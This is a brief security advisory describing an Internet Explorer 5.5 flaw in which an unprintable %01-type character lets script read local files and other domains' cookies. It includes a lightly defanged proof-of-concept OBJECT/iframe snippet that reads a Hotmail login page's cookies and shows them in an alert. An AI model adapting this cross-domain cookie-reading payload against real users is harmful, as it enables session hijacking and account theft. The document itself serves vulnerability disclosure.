|
|
|
|
| |
| When a 'square' (an undisplayable character, which is equal to the 1st character in the ASCII table) is inserted in some strategic position in a JavaScript code, it is possible to access to local files, the IFRAMES DOM, cookies from other domains and more. |
| |
Credit:
The information has been provided by Alp Sinan.
|
| |
Vulnerable systems:
Microsoft Internet Explorer version 5.5
The original "%01" bug was discovered by Georgi Guninski. The bug affected various versions of IE and was patched later. It involved the usage of %01 to cause scripts to be executed, even when they should not.
The following code is an example to a new attack that is very similar to the previous one. The code will access cookies of any domain:
(Before testing this code replace '!' with 'i' in the script tag)
<OBJECT
classid="clsid:AE24FDAE-03C6-11D1-8B76-
0080C744F389" width="1024" height="500">
<PARAM NAME="URL" value="about:<iframe id=box
src='http://lc2.law5.hotmail.passport.com/cgi-
bin/login' width='800' ></iframe><scr!pt>setTimeout
('alert(\'your cookie from hotmail
\'+box.document.cookie)',10000) </scr!
pt> http://lc2.law5.hotmail.passport.com/cgi-
bin/login">
</OBJECT>
Additional demonstrations can be found at http://horoznet.com/AlpSinan.
|
|
|
|
|
|
|
